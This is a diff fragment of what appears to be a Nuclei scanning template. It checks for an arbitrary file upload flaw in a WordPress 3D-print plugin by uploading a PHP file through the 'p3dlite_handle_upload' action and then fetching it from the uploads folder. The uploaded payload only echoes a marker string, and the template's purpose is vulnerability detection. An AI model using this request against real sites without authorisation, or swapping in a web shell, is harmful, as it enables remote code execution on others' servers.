22	+	Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
23	+
24	+	-----------------------------54331109111293931601238262353
25	+	Content-Disposition: form-data; name="action"
26	+
27	+	p3dlite_handle_upload
28	+	-----------------------------54331109111293931601238262353
29	+	Content-Disposition: form-data; name="file"; filename={{randstr}}.php
30	+	Content-Type: text/php
31	+
32	+	<?php echo '3DPrint-arbitrary-file-upload'; ?>
33	+	-----------------------------54331109111293931601238262353--
34	+
35	+	- \|
36	+	GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
37	+	Host: {{Hostname}}
38	+
39	+	req-condition: true
40	+	matchers:
41	+	- type: dsl
42	+	dsl:
43	+	- 'contains(all_headers_2, "text/html")'
44	+	- "status_code_2 == 200"
45	+	- "contains(body_2, '3DPrint-arbitrary-file-upload')"
46	+	condition: and
47	+

up PoCs 2022-09-16